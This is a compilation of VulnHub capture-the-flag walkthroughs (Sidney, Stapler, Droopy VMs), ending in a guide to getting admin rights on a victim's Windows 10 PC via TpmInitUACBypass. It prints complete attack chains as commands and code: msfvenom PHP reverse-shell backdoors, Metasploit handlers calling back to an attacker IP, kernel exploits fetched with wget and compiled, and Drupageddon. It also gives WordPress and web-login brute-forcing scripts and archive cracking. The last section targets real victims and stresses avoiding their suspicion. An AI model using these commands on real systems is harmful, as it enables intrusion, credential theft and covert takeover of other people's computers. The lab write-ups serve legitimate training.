Hack the Sidney VM (CTF Challenge)


Today we will take up a boot2root challenge by Nightmares: Sidney: 0.2. This is the third challenge he has kindly released. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM; you will need to snag the flag. You can download the VM from –> https://www.vulnhub.com/entry/sidney-02,149/
Breaching Methodology:
1. Network scanning (nmap, netdiscover)
2. Information gathering:
   • web server enumeration (view source)
   • directory brute-force (dirb)
   • Wikipedia
3. Generate our own dictionary (crunch)
4. Log in to the admin console
5. Generate a PHP backdoor (msfvenom)
6. Upload and execute the backdoor
7. Reverse connection (Metasploit)
8. Kernel privilege escalation (Metasploit)
9. Gain root access
10. Hunt for flag.zip
11. Crack flag.zip and read the flag

First we need to know which IP the VM got, so naturally we scan the network using:
netdiscover




Now that we have located our target IP i.e. 192.168.1.103, our next step is to scan it.
nmap -A -p- 192.168.1.103




The scan shows port 80 open, which means the target serves a web page, so let's open the IP in the browser.




Then we decided to look into its page source.




So we opened it in the browser (192.168.1.103/commodore64) and, to our luck, found another page.




Reading this page's source you learn that the username is robhubbard, and further down there are hints about the password:
  • the password is in lowercase
  • it has 3 letters followed by four digits
  • it is related to the C=64 sound chip




Then we ran dirb for a web directory brute-force attack, and it showed many directories. I was interested in index.php and decided to explore it.




So we opened it, and as you can see it asks for a username and password. We already know the username; we just have to find the password.




Given the hints about the password, we first looked up the C=64 sound chip on Wikipedia and found:




We know that the password's first three characters are letters, so our best guess is that MOS (the chip's manufacturer) is that part of the password.
Everything now rests on the last four digits, and to enumerate those we use the crunch command:
crunch 7 7 -t mos%%%% -o /root/Desktop/dict.txt
(7 7 fixes the length at seven characters; in the -t pattern the literal "mos" is kept and each % expands to one digit, so the file holds 10,000 candidates.)




Crunch writes the dictionary file.
Then run the dictionary attack with Burp Suite (Intruder), and it reveals the password as shown below:
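The dictionary attack above is the same loop Burp Intruder runs: expand the mask, submit each candidate, and watch for the one response that differs. As an added example (not code from the original walkthrough), here is that loop in Python, so the success check is explicit. The target URL, the form field names and the b"Wrong" failure string are assumptions; replace them with what the real index.php form sends (capture one request in Burp first).

```python
"""Crunch-style mask expansion plus an HTTP login dictionary attack.

Added example, not code from the original walkthrough. The URL, the form
field names and the failure string are assumptions; replace them with what
the real index.php form sends.
"""
import itertools
import string
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Iterator, Optional

# crunch -t placeholders: @ lowercase, , uppercase, % digit, ^ symbol
MASK_SETS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",
}


def mask_wordlist(mask: str) -> Iterator[str]:
    """Expand a crunch -t mask; characters outside MASK_SETS are literals.

    mask_wordlist("mos%%%%") yields mos0000 .. mos9999, the same 10,000
    words that `crunch 7 7 -t mos%%%%` writes to its -o file.
    """
    slots = [MASK_SETS.get(ch, ch) for ch in mask]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def make_form_oracle(url: str, user_field: str, pass_field: str,
                     username: str, failure_marker: bytes) -> Callable[[str], bool]:
    """Build a callable that POSTs one guess and reports whether it succeeded.

    Success is inferred from the *absence* of failure_marker in the body, so
    calibrate the marker with a known-bad password before trusting it. An
    HTTP error status (401/403/500) is treated as a failed guess.
    """
    def attempt(password: str) -> bool:
        data = urllib.parse.urlencode(
            {user_field: username, pass_field: password}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                body = resp.read()
        except urllib.error.HTTPError:
            return False
        return failure_marker not in body
    return attempt


def dictionary_attack(candidates: Iterable[str],
                      attempt: Callable[[str], bool]) -> Optional[str]:
    """Try candidates in order; return the first one the oracle accepts, else None."""
    for password in candidates:
        if attempt(password):
            return password
    return None


if __name__ == "__main__":
    # Assumed form: fields 'username'/'password'; body contains b"Wrong" on failure.
    oracle = make_form_oracle("http://192.168.1.103/commodore64/index.php",
                              "username", "password", "robhubbard", b"Wrong")
    print(dictionary_attack(mask_wordlist("mos%%%%"), oracle))
```

Calibrate the failure marker with a known-bad password first; a login that returns 200 for both outcomes but differs only in body length needs a length comparison against that baseline instead. Because mask_wordlist is a generator, the 10,000 candidates never have to be written to disk, and the same oracle shape works for any form.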



Now enter the username and password on the index.php page. The page that opens lets you upload a file, and that is where our malicious PHP file goes.







Now, to generate the PHP payload, open a terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
At the same time, start a multi/handler inside the Metasploit framework.




Copy the output from <?php to die() and save it in a file with a .php extension. Now upload this file through the upload form on the web page.




Meanwhile, return to the Metasploit terminal and start the multi/handler so it is listening for the Meterpreter session before the uploaded file is executed:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.108
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit
Browse to the uploaded file so the PHP runs. In the image below you can see Meterpreter session 1. The task is not finished yet: we still need to escalate privileges.




By running sysinfo we learn the target's kernel version, 4.4, and with that we find a Metasploit module for kernel privilege escalation. Type the following commands:
use exploit/linux/local/bpf_priv_esc
msf exploit(linux/local/bpf_priv_esc) > set session 1
msf exploit(linux/local/bpf_priv_esc) > set lhost 192.168.1.108
msf exploit(linux/local/bpf_priv_esc) > set lport 8888
msf exploit(linux/local/bpf_priv_esc) > exploit
This gives a second Meterpreter session running as root. Now let's move into the root directory and look for the flag:
cd /root
ls




It shows a hint.gif file; let's download it:
download hint.gif /root/Desktop/




When we opened hint.gif it showed the image below, and I was unable to take a hint from their conversation.




Next I walked down the hidden directories under /root:
cd .commodore64
ls
cd .miami
ls
cd vice
ls
Here is flag.zip. Let's download it to our desktop with the following command:
download flag.zip /root/Desktop/




We run a dictionary attack on the archive with rockyou.txt; the command is:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt flag.zip
(-v verbose, -u verifies each hit by actually unzipping rather than trusting the CRC check, which weeds out false positives, -D dictionary mode, -p the wordlist.) Once it prints the password, unzip the archive:
unzip flag.zip
It will prompt for the password; enter the one fcrackzip just found.




And YAY!!!!! We have captured the Flag!!! Enjoy with it.


Hack the Stapler VM (CTF Challenge)

In this article we will try to attack and gain root access on the Stapler: 1 challenge from VulnHub. The goal is to perform reconnaissance, enumeration and exploitation on this vulnerable machine to get root access and read the contents of flag.txt. We have been told there are various methods to do so; we tried several and found the simplest way.
Download the stapler vm from here
Penetrating Methodology:
·         Network scanning (nmap, netdiscover)
·         Enumeration (robots.txt)
·         WordPress scanning and password cracking (wpscan)
·         Log in to WordPress
·         Generate a PHP backdoor (msfvenom)
·         Upload and execute the backdoor
·         Reverse connection (Metasploit)
·         Import a Python one-liner for a proper TTY shell
·         Kernel privilege escalation
·         Get root access and capture the flag.

Start off by scanning the network to find our target. The command for it is:
netdiscover

We found our target –> 192.168.1.126


To scan our target IP we use an aggressive scan (-A) over all ports (-p-):
nmap -p- -A 192.168.1.126


The result shows that ports 21, 22, 53, 80, 137, 139 and many others are open.


It also reports a robots.txt with 2 disallowed entries, /admin112233 and /blogblog. We then explored the target IP over port 80 but found nothing there.
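Nmap's http-robots.txt script just prints the file; the same check is worth scripting for every web port a scan turns up, because a Disallow line is a list of paths the owner did not want crawlers to see. As an added example (not code from the original walkthrough), here is a small robots.txt parser and prober in Python. SAMPLE_ROBOTS is constructed to mirror the two entries above, and the base URL on port 12380 is an assumption taken from the next step of the walkthrough.

```python
"""Parse robots.txt Disallow entries and probe each one.

Added example, not code from the original walkthrough. SAMPLE_ROBOTS is a
constructed stand-in for the target's file; the base URL is an assumption.
"""
import ssl
import urllib.error
import urllib.request
from typing import Dict, List, Tuple

# Constructed sample; the real file lives at <base_url>/robots.txt.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
Disallow:            # an empty Disallow allows everything: ignore it
Disallow: /blogblog/ # duplicate
# Sitemap: /sitemap.xml
"""


def parse_disallow(robots_txt: str) -> List[str]:
    """Return the unique, non-empty Disallow paths in file order.

    Comments (#...) and blank lines are skipped; the key is matched
    case-insensitively because servers are not consistent about it.
    """
    paths: List[str] = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key.lower() == "disallow" and value and value not in paths:
            paths.append(value)
    return paths


def fetch(url: str, insecure: bool = False) -> Tuple[int, bytes]:
    """GET a URL; insecure=True skips certificate validation, which lab boxes
    with self-signed certs need (the same reason wpscan needs --disable-tls-checks)."""
    ctx = ssl._create_unverified_context() if insecure else None
    with urllib.request.urlopen(url, timeout=10, context=ctx) as resp:
        return resp.status, resp.read()


def probe_paths(base_url: str, paths: List[str], insecure: bool = False) -> Dict[str, int]:
    """Request each disallowed path and record its HTTP status (0 = no answer).

    A 200, 301 or 403 on a path the owner asked crawlers to avoid is exactly
    the kind of lead worth following up by hand.
    """
    results: Dict[str, int] = {}
    for path in paths:
        url = base_url.rstrip("/") + "/" + path.lstrip("/")
        try:
            status, _ = fetch(url, insecure)
        except urllib.error.HTTPError as err:
            status = err.code
        except urllib.error.URLError:
            status = 0
        results[path] = status
    return results


if __name__ == "__main__":
    base = "https://192.168.1.126:12380"  # assumed: the port that served the blog
    robots = fetch(base + "/robots.txt", insecure=True)[1].decode("utf-8", "replace")
    for path, status in probe_paths(base, parse_disallow(robots), insecure=True).items():
        print(f"{status:>3}  {base}{path}")
```

Run it once per web port (80, 12380, http and https); a path that answers 403 is still a find, since it confirms the directory exists even when the listing is blocked.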


So we tried opening it in the browser on port 12380.


We opened /blogblog/ there, but found no clue for the next step either.


Then we tried https://192.168.1.126:12380/blogblog/ over HTTPS, which brought up a new web page as shown below. Studying this blog we established that it is built on WordPress, so the obvious next step is WPScan to learn all about it.


For wpscan we came up with a 3-in-1 command that enumerates all themes and all plugins as well as usernames (the target uses a self-signed certificate, hence --disable-tls-checks):
wpscan --url https://192.168.1.126:12380/blogblog/ --enumerate at,ap,u --disable-tls-checks


It dumped all the usernames for the login; now we only need a password to log into WordPress.


Running the command below brute-forces the password for john:
wpscan --url https://192.168.1.126:12380/blogblog/ --username john --wordlist /usr/share/wordlists/rockyou.txt --disable-tls-checks
As you can see, the password is "incorrect" for user "john"; now use these credentials to log into WordPress.


Once logged in, all we have to do is create the PHP code to upload, so that when it executes we get a session. To generate the code, type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.132 lport=4444 -f raw
On the other side, run multi/handler inside the Metasploit framework.


Copy the output from <?php to die() and save it in a file with a .php extension (shell.php).
Now, as we are already logged in, go to Plugins, choose Add New and then Upload Plugin. Click Browse, select the .php file you just saved and click OK. WordPress will refuse to install it as a plugin, but the file is still written to the uploads directory.


Now browse to the uploads directory (wp-content/uploads) and open the shell.php you just uploaded so that it executes.


Meanwhile, return to the Metasploit terminal and start the multi/handler so it catches the Meterpreter session when shell.php runs:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.132
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit
In the image below you can see Meterpreter session 1. The task is not finished yet; we still need to escalate privileges. Start with:
sysinfo
Then, to get a proper TTY, drop to a shell and spawn one with the Python one-liner:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a


We now know that our target runs Ubuntu 16.04, so we search for a matching exploit on exploit-db.com. The search is successful and we find an appropriate exploit, as shown below:


Now change into a directory we can write to, where the exploit can be dropped and built:
cd /tmp
Then download the exploit:
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip


The download is a zip archive, so unzip it:
unzip 39772.zip
Enter the unzipped directory:
ls
cd 39772
Inside is a tarball named exploit.tar; extract it with:
tar -xvf exploit.tar


Use ls to see what was extracted, then move into the double-put exploit directory and build it:
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh (builds the exploit)
./doubleput (runs the compiled exploit; on success it drops you into a root shell)
From that root shell:
cd /root (takes you into /root)
ls (lists the contents of /root)
cat flag.txt
Note: This lab can be solved in multiple ways because there are more than one method to hack this lab.

Hack the Droopy VM (CTF Challenge)



In this article we will complete a challenge from the Capture the Flag series: a walkthrough of the Droopy VM, a vulnerable machine that is a little more complex than it first appears. Download it from –> Here
Walkthrough
Let us start by scanning the network so that we can learn the IP of our target. To scan the network, type the following:
netdiscover

So by using the above command we know our target IP is 192.168.1.102. Now that we know the target, let's study it more closely with nmap:
nmap -p- -A 192.168.1.102
Here,
-p-  --> scan all 65535 TCP ports, not just nmap's default top 1000
-A   --> aggressive scan: OS and version detection, default scripts and traceroute
Nmap shows that port 80 is the only open port, so let's open the IP in the browser.
Studying the web page we learn that the site is built on the Drupal CMS, and we all know Metasploit has a very effective exploit for it (Drupageddon). To use it, type:
use exploit/multi/http/drupal_drupageddon
The module needs rhost, which you set with the following command, and then run the exploit:
set rhost 192.168.1.102
exploit
As the exploit runs you get a Meterpreter session. Run sysinfo first to gather information about the target: it tells us the OS is Linux with kernel version 3.13.0, and this kernel has a known local exploit on www.exploit-db.com. Search for it from the Kali terminal:
searchsploit 3.13.0
Copy the exploit it lists, 37292.c, to the desktop. Back in Meterpreter, go to /tmp by typing cd /tmp and upload the exploit there:
upload /root/Desktop/37292.c
Once the exploit is uploaded, drop to a shell with the shell command and spawn a proper TTY:
python -c 'import pty;pty.spawn("/bin/bash")'
Then compile the exploit:
gcc 37292.c -o shell
Once it has compiled, make the binary executable:
chmod 777 shell
Then run ./shell. This is a privilege escalation exploit, so once it runs you are root on the VM.
Check with id: it shows that you are root. Jump to the root folder with cd /root and ls to list the files inside. There is one file, dave.tc; copy it to /var/www/html so we can pull it down through the browser:
cp dave.tc /var/www/html
Now fetch the file in the browser:
192.168.1.102/dave.tc
Next go into /var (cd /var) and ls to view its contents, then into mail (cd mail) and ls again, and cat www-data to read the mailbox.
In www-data we find a mail that gives two hints about the password we need: it is in the rockyou wordlist, and it carries "academy" as a prefix or suffix. So we take every rockyou entry containing "academy" and write it to a separate wordlist of candidates:
grep academy /usr/share/wordlists/rockyou.txt > /root/Desktop/dict.txt
Now run a dictionary attack with that wordlist against the TrueCrypt container:
truecrack --truecrypt /root/Downloads/dave.tc -k SHA512 -w /root/Desktop/dict.txt
With the password recovered, mount the container with VeraCrypt (it can open TrueCrypt volumes), entering the password we just found. Once it opens you can see all of its contents; the folders you will find are shown below.

Open the mount path in a Kali terminal and type ls -la to view the files (the interesting ones are hidden, so plain ls will not show them). Enter .secret with cd .secret and ls -la, then .top with cd .top and ls -la. There you will find flag.txt; type cat flag.txt to view the flag.

And yippiiee!!! We found our flag. 😊


Hack Admin Access of Remote Windows 10 PC using TpmInitUACBypass

Microsoft keeps tightening security with each version of Windows, and with that it gets harder and harder to compromise. Still, "where there is a will, there is a way", and it is not impossible. Once you have compromised a Windows 10 PC, the difficult part is gaining administrator access without making the victim suspicious. Here we present one way to do so.
Follow the steps below and you will learn how to gain administrator access to a Windows 10 PC without raising the victim's suspicion.
First of all, to learn how to hack the victim's PC, click here.
Once you have a Meterpreter session on the victim, type:

getsystem

If getsystem fails, that confirms the session does not yet have administrator privileges. There is no need to worry: download the TpmInitUACBypass file from --> here
And now upload the said file into victim's PC by typing :

upload /root/Desktop/TpmInitUACBypass.exe d:\\

Here,
upload --> uploads a file through the Meterpreter session
/root/Desktop/TpmInitUACBypass.exe --> the path of the file to be uploaded

d:\\ --> the location on the victim's PC where the file will be written (the backslash is doubled because Meterpreter treats \ as an escape character)


While the file uploads, open Metasploit in parallel and start a handler to catch the elevated session:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 443
exploit


With the handler listening, go back to the Meterpreter session you already had and type:
shell

Typing shell drops you into a command prompt on the PC. Then type:

d: (switches to the D: drive of the victim's PC, where you uploaded the file)

TpmInitUACBypass.exe 192.168.0.106 msf (runs the uploaded file, pointing it at the IP where the handler is listening)


When that command runs our file, we get a new session with administrator privileges, as shown below.